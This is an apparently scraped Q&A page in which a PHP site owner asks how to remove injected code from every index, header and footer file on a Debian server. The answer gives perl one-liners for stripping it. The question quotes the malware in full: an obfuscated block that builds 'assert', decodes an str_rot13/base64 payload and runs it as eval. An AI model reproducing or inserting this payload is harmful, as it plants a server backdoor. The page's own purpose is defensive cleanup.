php - Malware attack on my server -

- June 15, 2011

all index.php, header.php, footer.php files on server have code segment. possible malware. remove junk data files @ once. i'm using php on debian system.

<?php //###=cache start=### error_reporting(0);  $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("njltxtymp2i0xpeclalcxfo7vtiwnt8twtyvqwftsfoyouayvuftmkwlo3wspzijo3w0nj5axqncbjccozysp2i0xpwxnkajots5k2ilpz9lplvfvpvjvvx7pzyzvptunkammkdbwtyvqvxcvufxnjlbvjigpue5xpesd09cf0ysjlwwotyyoaesl2uyl2fvkfxcvtecmftxk0acg0gweifvl2kcmj50k2abmjaevy0cbjccmvujpziak21uqtabxppukszuqfpfvtmcotism2i0k2aioaeyoaemxpesh0ifixifjlwgd1wwhsesexyzeh5oghhvkfxcxfnxlln9vpw1vwftmjkmmfnxlln9vpw3vwfxwtdtcfnxk1ashymshyfvh0ifixifk05oghhvkf4xk1ashymshyfvhxieihigis9ihxxvkgfxwuhtcfnxk1ashymshyfvfsehhs9ih0ifk0sueh5hvy07pvecppn9vpesh0ifixifjlwfeh1cirisdherhvwqbjbxqkwfvq0tvzu0qun6yl9gmjquykwuqtyhml5lqf9amkdhptujc2yjcfvhqkwfmj5wo2eyxpecppxhvvmxcfvhqkwfmj5wo2eyxpexxf4vwah9vv51pzkyozaimthbwuhcyvvzlm0vyvewyvvzng0kwzt9vv5gmqhbvwn1ljizmgixmwn4zgt5awquzjv0agx2atzmaqlkamsyvv4xmp4xqf4xll4vzfvcbjccmvucozysm2i0xpwuotkiq191pzksmz9jmj4vxfn9cfnkxfo7pveclaltcfoznjkyk2qyqs9wo250mj50pltxqkwfxgfxsfoyouaynjlbmaihl3eco25smkucp3emxpwwqkwfk2yhnkdvxfxtrjbxl2ttcfowqkwfk2yhnkdbwuilopx7pza1pzksp2i0o3o0xpewnpjtd1ifgr9dis9vehsreivfvrmogsasxgfxl3ilos9mmkeipudbwtabypoqiiwzg1ohk1wsisifgyefdh5gexifypohhyisxgfxwuwyp3ifqpn9vta1pzksmkuylltxl2tcbjcwqkwfk2afo3ayxpewnpx7pveclaltcfnxpzimqjk0bjc9vtifp2htrjbxmantcfozp29wn29jmj4bvz1ym2rgpzs0nj5ayaw1vvjtbqnfvpeypawholjtwtilpaa0pvjtzmncbjccmvnbwtmjxfo7pvntvpnxo3i0vq0tvxqsipnim2i0yaobpq9cpq0vyailotihl29xmftxnkncyvvzmq0vyailotihl29xmftxmpxhvvm1cfvhqkwfmj5wo2eyxpe1xf4vwzz9vv4xll4vwzx9zfmbcfvhojd1xpvjajsymzh1mtljbqr4bgl3lgsvaqh5awewzmd2zgpkmfvhwtdhwuhhwtzhvwrvxf4vvruhisnizf4kkuwpovv7pvntvpnxo3i0vp49vpwvo3a0bvogmjquykwuqtyhml5lqiklkt4vbjbtvpntwt91qpnhcfnvd29hoziwqtyiowbtd2kip2ippykhkuwpovv7pvntvpozq3wcqthbwtmjypnxo3i0xgfxvpntvpelmkajvq0tvvv7pvntvpo3ntyfmfnbvjmyo2lbwtmjxfxtrjbtvpntvpntvpelmkajvp49vtmamkemxpezppjtzgv4xgfxvpntvu0xvpntvtmwot9mmftxmancbjbtvpntotymqptxntiumtilypnxlz9xrfxtcfojpziak3ajoty0xpvikswphv8vypnxpzimppjtzvx7pvntvpnxnjw2vq0twtwimux7pa0xsdc9bjccmvucp3ayqptxk1wshiish1eovanvkfxtwvltws9feisieiahjlwjvy0tcg0tvwl5lzzjbgzjvvxtrloyqzsfxua0pzyjp2kup2uypltxk1wshiish1eovzzvkfxcblo9pziwnt8twtyvqwg9"));')); //###=cache end=### ?>

i've tried using regex via php no i've tried sed on linux server

sed -e '/@\$stringd' index.php

but unable save file. please help.

reinstalling server indeed safest option.
without recent backups of php scripts ...

anyway, sed isn't best tool multi-line replacements in files.
, you'd want remove between cache comments.
use perl or awk that.

here's single line perl solution removes comments file.
(also creates .bak copy of original file)

perl -i.bak -p -0 -e 's@//###=cache.*?cache end=###@@gs' index.php

note @ used separators of regex. typically / used, way / don't have backslashed in regex.

for multiple *.php files (without .bak copies)

perl -i -p -0 -e 's@//###=cache.*?cache end=###@@gs' *.php

the perl flags used:

-i[extension]     edit <> files in place (makes backup if extension supplied) -p                assume loop -n print line also, sed -0[octal]         specify record separator (\0, if no argument) -e program        1 line of program (several -e's allowed, omit programfile)

Search This Blog

M16

php - Malware attack on my server -

Comments

Post a Comment

Popular posts from this blog

Failed to execute goal org.apache.maven.plugins:maven-surefire-plugin:2.12:test (default-test) on project.Error occurred in starting fork -

windows - Debug iNetMgr.exe unhandle exception System.Management.Automation.CmdletInvocationException -

configurationsection - activeMq-5.13.3 setup configurations for wildfly 10.0.0 -